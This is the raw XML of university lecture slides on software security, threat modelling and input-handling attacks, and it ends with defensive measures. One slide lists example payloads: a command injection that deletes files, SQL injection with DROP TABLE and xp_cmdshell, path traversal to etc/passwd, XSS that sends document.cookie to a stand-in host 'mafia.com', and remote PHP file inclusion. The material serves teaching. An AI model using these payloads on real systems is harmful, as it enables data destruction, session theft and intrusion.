              <a:t>malicious JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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ActionScript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XML bombs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zip bombs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SMB relay attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with bizarre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>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080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More obscure injection attacks on Microsoft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Attackers can trigger RCE in Office without normal (Visual Basic) macros, using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DDE (Dynamic Data Exchange)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Also possible with emails in Outlook Rich Text Format (RTF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>             https://sensepost.com/blog/2017/macro-less-code-exec-in-msword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Excel 4.0 macros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Archaic legacy features that predate VBA  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://outflank.nl/blog/author/stan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/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Recall: 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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in data formats is bad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty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1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DDE warnings in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Microsoft initially claimed DDE was a feature, and not a bug, but later then did publish a security advisory in autumn 2017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56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50000" r="14563" b="19744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699792" y="3284984"/>
            <a:ext cx="4786966" cy="1376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8" r="4326" b="23327"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1319592"/>
            <a:ext cx="5544616" cy="1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5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1BB05-2363-E5C1-98B3-F2037A47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0" y="1012681"/>
            <a:ext cx="7952127" cy="5421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Windows supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600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notations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>  for file names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classic MS-DOS notation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C:\MyData\file.txt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file URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>                               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file:///C|/MyData/file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>(Uniform Naming Convention)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\\192.1.1.1\MyData\file.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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sz="1600" dirty="0"/>
              <a:t>which can be combined in fun ways, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>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file://///192.1.1.1/MyData/file.txt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Some notations cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unexpected behaviour  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by involving other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocols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UNC paths to remote servers are handled by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/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SMB sends password hash to remote server to authenticate,                                                        aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass the hash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This can be exploited by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB relay attacks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GB" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-0834 in Windows telnet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2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-4037 in Windows XP/Server/Vista                              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-5166 in Chromium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…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2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-3085 &amp;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-4271 in Adobe Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…                                                           …            …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>ZDI-16-395 in Foxit PDF viewer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Recall: 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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and (unexpected)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EXPRESSIITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats is bad</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="777611" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1451" dirty="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2177" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1451" dirty="0"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t>[Example thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0" err="1"/>
              <a:t>Björn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0" err="1"/>
              <a:t>Ruytenberg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t>, https://blog.bjornweb.nl]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96400895-9641-9132-873D-65C5D29D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77" dirty="0"/>
              <a:t>SMB relays: Injection attacks via Windows file names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Tijdelijke aanduiding voor dianummer 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD619065-3C22-14D3-61E5-F1F5B8A31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BF0F52F-21B9-46B2-AFDF-3BA1C6F63242}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"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Some programming languages have an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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/>
              <a:t>function  which treats an input string as code and executes it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> languages an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dirty="0"/>
              <a:t> construct:                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript, python, Haskell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1800" i="1" dirty="0"/>
              <a:t>Why do languages have this?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Useful for functionality: it allows very ‘dynamic’ code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>Why is this a terrible idea?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Prime target for injection attacks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Complicates static analysis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9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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is evil and should never be used!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972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Social Engineering as injection attacks?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forms of social engineering can be regarded as injection attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attackers trick victims into executing some command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59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068959"/>
            <a:ext cx="2441399" cy="3049173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 bwMode="auto">
          <a:xfrm>
            <a:off x="4885927" y="3212976"/>
            <a:ext cx="2736304" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63172"/>
              <a:gd name="adj2" fmla="val 4562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Grant me    a thousand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wishes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18215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i="1" dirty="0"/>
              <a:t>How would you attack this website?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6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2987824" y="4165460"/>
            <a:ext cx="3094021" cy="5596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4061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defend against input attacks?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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevent</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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Typically by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure input handling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But also: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>! 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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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the potential impact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</a:rPr>
              <a:t>Reduce the expressive power of inputs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</a:rPr>
              <a:t>Reduce privileges, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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                                                                         isolate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandbox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> compartmentalise</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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:   do not run your web server as root, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>do not run your customer web server on same machine as your salary administration, run JavaScript inside browser sandbox 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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection &amp; react</a:t>
            </a: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</a:rPr>
              <a:t>Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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to see if things go/have gone wrong</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for forensic investigation afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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84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Fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" baseline="-25000" dirty="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> to try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980728"/>
            <a:ext cx="7761288" cy="51041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Ridiculously long inputs to cause buffer overflows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or with lots of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x%x%x%x%x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to trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> format string attacks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OS command injection     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl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; 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rm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–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/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SQL injection                      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erik@ru.nl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’; DROP TABLE Customers;--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erik@ru.nl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’; exec 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master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Path traversal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lang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etc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passwd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lang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../../../../dev/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urandom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Forced Browsing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uid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s000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  ,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s001</a:t>
            </a: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                      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HTML injection &amp; XSS   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via HTML input in the text field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          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&lt;html&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src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=”http://a.com/a.jpg”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width =”999999999” height=”999999999”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&gt;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                    &lt;html&gt;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&lt;script&gt; …;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img.src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 =”http://mafia.com/” +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document.cookie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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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</a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or via URL parameter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http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=s456&amp;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&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Local or Remote PHP file injection          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http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?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../../admin/menu.php%00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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                        http://company.nl/XYZ123/index.html?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http://mafia.com/attack.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, LDAP, XML, SSI, XXE, OGNL,  … injection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490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Fun files to upload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Just to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS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zip or XML bomb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40 Kb zip file can expands to 4GB when unzipped - aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip of death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1Kb XML file can expand to 3 GB when XML parser expands recursive definitions as part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canonicalisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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To take over control in more interesting ways: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.exe file</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed PDF file to exploit flaw in PDF viewer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malformed XXX  file to exploit flaw in XXX viewer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esp. for complex file formats with viewers in memory-unsafe languages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Word or Excel document with macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>old-time favourite, but still works &amp; still in use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Uploading some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>if you have another attack to trick browsers into executing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000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419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000" i="1" dirty="0"/>
              <a:t>Other attack vectors,  besides these input possibilities?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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3779912" y="4165459"/>
            <a:ext cx="2301933" cy="4156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42109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ss b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ngepast 1">
      <a:majorFont>
        <a:latin typeface="Arial Rounded MT Bold"/>
        <a:ea typeface="DejaVu Sans"/>
        <a:cs typeface="DejaVu Sans"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial Rounded MT Bold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40307</TotalTime>
  <Words>3956</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>848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Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Ink Free</vt:lpstr>
      <vt:lpstr>Pieces NFI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Software Security Threat Modelling &amp;  INPUT problems  </vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Recap: before mid-term break</vt:lpstr>
      <vt:lpstr>This week and next week</vt:lpstr>
      <vt:lpstr> Threat modelling  </vt:lpstr>
      <vt:lpstr>How would you attack this website?</vt:lpstr>
      <vt:lpstr>Fun input to try</vt:lpstr>
      <vt:lpstr>Fun files to upload </vt:lpstr>
      <vt:lpstr>Other attack vectors,  besides these input possibilities?</vt:lpstr>
      <vt:lpstr>Other attack vectors</vt:lpstr>
      <vt:lpstr>Example supply chain attacks  </vt:lpstr>
      <vt:lpstr> SBOM </vt:lpstr>
      <vt:lpstr>Threat modelling</vt:lpstr>
      <vt:lpstr> HOW  things go wrong:  classes of security vulnerabilities</vt:lpstr>
      <vt:lpstr> Classifications &amp; rankings of security flaws</vt:lpstr>
      <vt:lpstr>OWASP Top Ten</vt:lpstr>
      <vt:lpstr>OWASP Top Ten</vt:lpstr>
      <vt:lpstr>SANS CWE Top 25     [2021]</vt:lpstr>
      <vt:lpstr>CWE Top 1357   [Nov 2023]</vt:lpstr>
      <vt:lpstr>tot hier</vt:lpstr>
      <vt:lpstr>CVE, CWE, CRE</vt:lpstr>
      <vt:lpstr>Memory corruption? </vt:lpstr>
      <vt:lpstr>Memory corruption </vt:lpstr>
      <vt:lpstr>Injection attacks?</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>Access control?  (authentication + authorisation) </vt:lpstr>
      <vt:lpstr>Access control? (authentication + authorisation)</vt:lpstr>
      <vt:lpstr>memory corruption, injection attacks, access control / authentication</vt:lpstr>
      <vt:lpstr>CWE Top 924   [Nov 2021]</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Classifications of security flaws</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Tackling INPUT problems     </vt:lpstr>
      <vt:lpstr>High level observations</vt:lpstr>
      <vt:lpstr>Attack surface for  input problems</vt:lpstr>
      <vt:lpstr>Attack surface for  input problems</vt:lpstr>
      <vt:lpstr>Terminology</vt:lpstr>
      <vt:lpstr> Audience poll</vt:lpstr>
      <vt:lpstr>Expect the unexpected!</vt:lpstr>
      <vt:lpstr>2-nd order attacks</vt:lpstr>
      <vt:lpstr>Example: 2nd order SQL injection</vt:lpstr>
      <vt:lpstr>High level observation: bug vs features</vt:lpstr>
      <vt:lpstr>bugs vs features</vt:lpstr>
      <vt:lpstr>Recurring themes: parsing &amp; languages</vt:lpstr>
      <vt:lpstr>Buggy parsing (1)</vt:lpstr>
      <vt:lpstr>Buggy parsing (2)</vt:lpstr>
      <vt:lpstr>Buggy parsing (3)</vt:lpstr>
      <vt:lpstr>Typical injection attack, eg SQLi</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>LDAP injection</vt:lpstr>
      <vt:lpstr>XPath injection</vt:lpstr>
      <vt:lpstr>Blind injection attacks</vt:lpstr>
      <vt:lpstr>More injection attacks</vt:lpstr>
      <vt:lpstr>More obscure injection attacks on Microsoft Office</vt:lpstr>
      <vt:lpstr>DDE warnings in Office</vt:lpstr>
      <vt:lpstr>SMB relays: Injection attacks via Windows file names</vt:lpstr>
      <vt:lpstr>Eval</vt:lpstr>
      <vt:lpstr>Social Engineering as injection attacks?</vt:lpstr>
      <vt:lpstr>How to defend against input attacks?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Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>466</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-10T10:17:45Z</dcterms:modified>
</cp:coreProperties>
</file>